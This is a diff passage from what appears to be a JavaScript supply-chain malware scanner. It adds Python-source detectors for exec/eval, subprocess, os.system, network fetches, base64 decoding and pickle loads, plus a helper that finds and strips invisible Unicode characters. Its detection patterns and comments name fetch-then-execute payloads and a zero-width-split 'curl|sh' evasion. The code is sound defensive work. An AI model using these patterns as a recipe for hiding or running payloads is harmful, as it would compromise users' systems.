+ // --- Pattern detectors. All operate on a content string that has already
151
+ // been Unicode-normalized + comment-stripped + docstring-stripped.
152
+
153
+ function detectImportTimeExec(content) {
154
+ // exec(...) or eval(...). Lookbehind excludes obj.exec(, ast.literal_eval(.
155
+ return /(?<![.\w])(exec|eval)\s*\(/.test(content);
156
+ }
157
+
158
+ function detectImportTimeSubprocess(content) {
159
+ return /\bsubprocess\.(Popen|run|call|check_output|check_call|getoutput|getstatusoutput)\s*\(/.test(content);
160
+ }
161
+
162
+ function detectImportTimeOsSystem(content) {
163
+ // os.system, os.popen, os.spawn*, os.execv/exec*
164
+ return /\bos\.(system|popen[234]?|spawn[a-z]+|exec[a-z]+)\s*\(/.test(content);
165
+ }
166
+
167
+ function detectNetworkFetch(content) {
168
+ if (/\burllib\.request\.urlopen\s*\(/.test(content)) return true;
169
+ if (/\burllib2\.urlopen\s*\(/.test(content)) return true;
170
+ if (/\brequests\.(get|post|put|delete|patch|head|options|request)\s*\(/.test(content)) return true;
171
+ if (/\bhttp\.client\.HTTPS?Connection\b/.test(content)) return true;
172
+ if (/\bhttpx\.(get|post|put|delete|patch|head|options|request|Client|AsyncClient)\b/.test(content)) return true;
173
+ if (/\baiohttp\.ClientSession\b/.test(content)) return true;
174
+ return false;
175
+ }
176
+
177
+ function detectBase64Decode(content) {
178
+ if (/\bbase64\.(b64|b32|b16|standard_b64|urlsafe_b64)decode\s*\(/.test(content)) return true;
179
+ if (/\bcodecs\.decode\s*\(/.test(content)) return true;
180
+ return false;
181
+ }
182
+
183
+ function detectDeserialization(content) {
184
+ return /\b(pickle|cPickle|marshal|dill|cloudpickle|jsonpickle|shelve)\.loads?\s*\(/.test(content);
185
+ }
186
+
187
+ function detectDynamicDangerousImport(content) {
188
+ return /__import__\s*\(\s*['"](subprocess|os|requests|urllib|urllib2|socket|http|ssl|ctypes|importlib)['"]/.test(content);
189
+ }
190
+
191
+ /**
192
+ * Scan Python source files under targetPath for import-time / install-time RCE.
193
+ *
194
+ * @param {string} targetPath
195
+ * @returns {Array<{type: string, severity: string, message: string, file: string}>}
196
+ */
197
+ function scanPythonSource(targetPath) {
198
+ const threats = [];
199
+
200
+ const files = findTargetPythonFiles(targetPath);
201
+ if (files.length === 0) return threats;
202
+
203
+ for (const file of files) {
204
+ let stat;
205
+ try {
206
+ stat = fs.statSync(file);
207
+ } catch { continue; }
208
+ if (!stat.isFile() || stat.size === 0 || stat.size > MAX_FILE_SIZE) continue;
209
+
210
+ let rawContent;
211
+ try {
212
+ rawContent = fs.readFileSync(file, 'utf8');
213
+ } catch { continue; }
214
+
215
+ const relPath = path.relative(targetPath, file);
216
+
217
+ // 1. PYSRC-008 — Unicode obfuscation (computed on raw content, before strip).
218
+ const invisibleCount = countInvisibleUnicode(rawContent);
219
+ if (invisibleCount >= PYSRC_UNICODE_THRESHOLD) {
220
+ threats.push({
221
+ type: 'python_source_unicode_obfuscation',
222
+ severity: 'CRITICAL',
223
+ message: `${relPath}: ${invisibleCount} invisible Unicode chars (zero-width / directional / variation selectors) — possible obfuscation hiding payload content from human review.`,
224
+ file: relPath
225
+ });
226
+ }
227
+
228
+ // 2. Normalize Unicode, strip docstrings + full-line comments.
229
+ const normalized = invisibleCount > 0 ? stripInvisibleUnicode(rawContent) : rawContent;
230
+ const cleaned = stripPythonComments(stripTripleQuotedStrings(normalized));
231
+
232
+ // 3. Atomic detectors.
233
+ const hasExec = detectImportTimeExec(cleaned);
234
+ const hasSubprocess = detectImportTimeSubprocess(cleaned);
235
+ const hasOsSystem = detectImportTimeOsSystem(cleaned);
236
+ const hasFetch = detectNetworkFetch(cleaned);
237
+ const hasBase64 = detectBase64Decode(cleaned);
238
+ const hasDeser = detectDeserialization(cleaned);
239
+ const hasDynImport = detectDynamicDangerousImport(cleaned);
240
+
241
+ if (hasExec) {
242
+ threats.push({
243
+ type: 'import_time_exec',
244
+ severity: 'CRITICAL',
245
+ message: `${relPath}: exec()/eval() at module level — direct code execution on import or pip install (RCE).`,
246
+ file: relPath
247
+ });
248
+ }
249
+ if (hasSubprocess) {
250
+ threats.push({
251
+ type: 'import_time_subprocess',
252
+ severity: 'CRITICAL',
253
+ message: `${relPath}: subprocess.Popen/run/call/check_output — spawns external process on import or install.`,
254
+ file: relPath
255
+ });
256
+ }
257
+ if (hasOsSystem) {
258
+ threats.push({
259
+ type: 'import_time_os_system',
260
+ severity: 'CRITICAL',
261
+ message: `${relPath}: os.system()/os.popen()/os.spawn*()/os.exec*() — shell execution on import or install.`,
262
+ file: relPath
263
+ });
264
+ }
265
+ if (hasDeser) {
266
+ threats.push({
267
+ type: 'import_time_deserialization',
268
+ severity: 'CRITICAL',
269
+ message: `${relPath}: pickle/marshal/dill/cloudpickle/jsonpickle .loads() — unsafe deserialization, trivially RCE if input is attacker-controlled.`,
270
+ file: relPath
271
+ });
272
+ }
273
+ if (hasDynImport) {
274
+ threats.push({
275
+ type: 'dynamic_dangerous_import',
276
+ severity: 'HIGH',
277
+ message: `${relPath}: __import__() with hardcoded dangerous module name (subprocess/os/requests/urllib/socket/...) — obfuscation pattern to evade static analysis.`,
278
+ file: relPath
279
+ });
280
+ }
281
+
282
+ // 4. Compound detectors (in addition to individual fires).
283
+ if (hasFetch && hasExec) {
284
+ threats.push({
285
+ type: 'import_time_fetch_exec',
286
+ severity: 'CRITICAL',
287
+ message: `${relPath}: network fetch (urllib/requests/http.client/httpx/aiohttp) AND exec/eval in same file — TrapDoor-style remote-payload-then-RCE.`,
288
+ file: relPath
289
+ });
290
+ }
291
+ if (hasBase64 && hasExec) {
292
+ threats.push({
293
+ type: 'import_time_base64_exec',
294
+ severity: 'CRITICAL',
295
+ message: `${relPath}: base64/codecs decode AND exec/eval in same file — obfuscated payload execution pattern.`,
296
+ file: relPath
297
+ });
298
+ }
299
+ }
300
+
301
+ return threats;
302
+ }
303
+
304
+ module.exports = {
305
+ scanPythonSource,
306
+ // Exported for unit testing of the helpers in isolation.
307
+ _internal: {
308
+ findTargetPythonFiles,
309
+ stripPythonComments,
310
+ stripTripleQuotedStrings,
311
+ detectImportTimeExec,
312
+ detectImportTimeSubprocess,
313
+ detectImportTimeOsSystem,
314
+ detectNetworkFetch,
315
+ detectBase64Decode,
316
+ detectDeserialization,
317
+ detectDynamicDangerousImport
318
+ }
319
+ };
@@ -0,0 +1,164 @@
1
+ 'use strict';
2
+
3
+ /**
4
+ * Unicode invisible character helpers — shared by obfuscation.js and ai-config.js.
5
+ *
6
+ * Extracted v2.11.25 (TrapDoor campaign, mai 2026) : la fonction locale dans
7
+ * obfuscation.js couvrait `.js/.cjs/.mjs/.ts/.tsx/.py` mais pas les configs IA
8
+ * (.cursorrules, CLAUDE.md). En la partageant, ai-config.js peut normaliser le
9
+ * contenu avant ses regex et bloquer le vecteur "cu<U+200B>rl|sh" avec ZW
10
+ * interspersés dans le mot-clé.
11
+ *
12
+ * Codepoints détectés (superset du scope original obfuscation.js, qui n'incluait
13
+ * pas LRM/RLM ni les directional override) :
14
+ *
15
+ * Zero-width:
16
+ * U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ
17
+ * U+2060 word joiner
18
+ * U+180E Mongolian vowel separator
19
+ *
20
+ * Directional (bidi spoofing — Trojan Source CVE-2021-42574) :
21
+ * U+200E LRM, U+200F RLM
22
+ * U+202A LRE, U+202B RLE, U+202C PDF, U+202D LRO, U+202E RLO
23
+ *
24
+ * Invisible math operators (peuvent casser un parser sans être vus) :
25
+ * U+2061 function application, U+2062 invisible times,
26
+ * U+2063 invisible separator, U+2064 invisible plus
27
+ *
28
+ * BOM (mid-text only; position 0 est légitime UTF-8 BOM) :
29
+ * U+FEFF
30
+ *
31
+ * Variation selectors :
32
+ * U+FE00-FE0E (excludes U+FE0F emoji presentation selector — légitime)
33
+ * U+E0100-E01EF supplementary plane variation selectors
34
+ *
35
+ * Tag characters (utilisés par GlassWorm pour encoder du payload) :
36
+ * U+E0001, U+E0020-E007F
37
+ *
38
+ * CJK, accents, emoji standards (avec U+FE0F) sont volontairement EXCLUS — pas
39
+ * de FP attendu sur du contenu international légitime.
40
+ *
41
+ * Références :
42
+ * - https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode
43
+ * - https://trojansource.codes/ (Trojan Source, CVE-2021-42574)
44
+ * - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
45
+ */
46
+
47
+ /**
48
+ * Returns true if the codepoint at position `i` is considered invisible.
49
+ * Sets `skipNext` true on the result if the codepoint is supplementary
50
+ * (caller must `i++` to skip the low surrogate half).
51
+ *
52
+ * @param {string} content
53
+ * @param {number} i
54
+ * @returns {{ invisible: boolean, supplementary: boolean }}
55
+ */
56
+ function inspectCodepoint(content, i) {
57
+ const cp = content.codePointAt(i);
58
+
59
+ // BMP zero-width
60
+ if (cp === 0x200B || cp === 0x200C || cp === 0x200D) {
61
+ return { invisible: true, supplementary: false };
62
+ }
63
+
64
+ // BMP directional (Trojan Source)
65
+ if (cp === 0x200E || cp === 0x200F ||
66
+ (cp >= 0x202A && cp <= 0x202E)) {
67
+ return { invisible: true, supplementary: false };
68
+ }
69
+
70
+ // BMP word joiner & friends
71
+ if (cp === 0x2060 || cp === 0x180E) {
72
+ return { invisible: true, supplementary: false };
73
+ }
74
+
75
+ // BMP invisible math operators (U+2061-2064)
76
+ if (cp >= 0x2061 && cp <= 0x2064) {
77
+ return { invisible: true, supplementary: false };
78
+ }
79
+
80
+ // BOM only suspicious after position 0
81
+ if (cp === 0xFEFF && i > 0) {
82
+ return { invisible: true, supplementary: false };
83
+ }
84
+
85
+ // BMP variation selectors (U+FE00-U+FE0E) — excludes U+FE0F emoji presentation
86
+ if (cp >= 0xFE00 && cp <= 0xFE0E) {
87
+ return { invisible: true, supplementary: false };
88
+ }
89
+
90
+ // Supplementary plane: variation selectors supplement (U+E0100-U+E01EF)
91
+ if (cp >= 0xE0100 && cp <= 0xE01EF) {
92
+ return { invisible: true, supplementary: true };
93
+ }
94
+
95
+ // Supplementary plane: tag characters (U+E0001 + U+E0020-U+E007F)
96
+ if (cp === 0xE0001 || (cp >= 0xE0020 && cp <= 0xE007F)) {
97
+ return { invisible: true, supplementary: true };
98
+ }
99
+
100
+ // Other supplementary chars (non-invisible) — need to skip low surrogate
101
+ if (cp > 0xFFFF) {
102
+ return { invisible: false, supplementary: true };
103
+ }
104
+
105
+ return { invisible: false, supplementary: false };
106
+ }
107
+
108
+ /**
109
+ * Count invisible Unicode codepoints in `content`.
110
+ *
111
+ * @param {string} content
112
+ * @returns {number}
113
+ */
114
+ function countInvisibleUnicode(content) {
115
+ let count = 0;
116
+ for (let i = 0; i < content.length; i++) {
117
+ const { invisible, supplementary } = inspectCodepoint(content, i);
118
+ if (invisible) count++;
119
+ if (supplementary) i++; // skip low surrogate half
120
+ }
121
+ return count;
122
+ }
123
+
124
+ /**
125
+ * Return a copy of `content` with all invisible codepoints removed.
126
+ *
127
+ * Used to normalize text before pattern matching: prevents an attacker
128
+ * from splitting a keyword (`cu<U+200B>rl`) with zero-width chars to evade
129
+ * regex like /curl\s+/i.
130
+ *
131
+ * @param {string} content
132
+ * @returns {string}
133
+ */
134
+ function stripInvisibleUnicode(content) {
135
+ // Fast path: if no codepoint > 0x7F, content is pure ASCII — nothing to strip.
136
+ let hasHighChar = false;
137
+ for (let i = 0; i < content.length; i++) {
138
+ if (content.charCodeAt(i) > 0x7F) { hasHighChar = true; break; }
139
+ }
140
+ if (!hasHighChar) return content;
141
+
142
+ let out = '';
143
+ for (let i = 0; i < content.length; i++) {
144
+ const { invisible, supplementary } = inspectCodepoint(content, i);
145
+ if (!invisible) {
146
+ // Preserve original char(s). For supplementary, copy both surrogate halves.
147
+ if (supplementary) {
148
+ out += content[i] + content[i + 1];
149
+ i++;
150
+ } else {
151
+ out += content[i];
152
+ }
153
+ } else if (supplementary) {
154
+ // Skip both surrogate halves
155
+ i++;
156
+ }
157
+ }
158
+ return out;
159
+ }
160
+
161
+ module.exports = {
162
+ countInvisibleUnicode,
163
+ stripInvisibleUnicode
164
+ };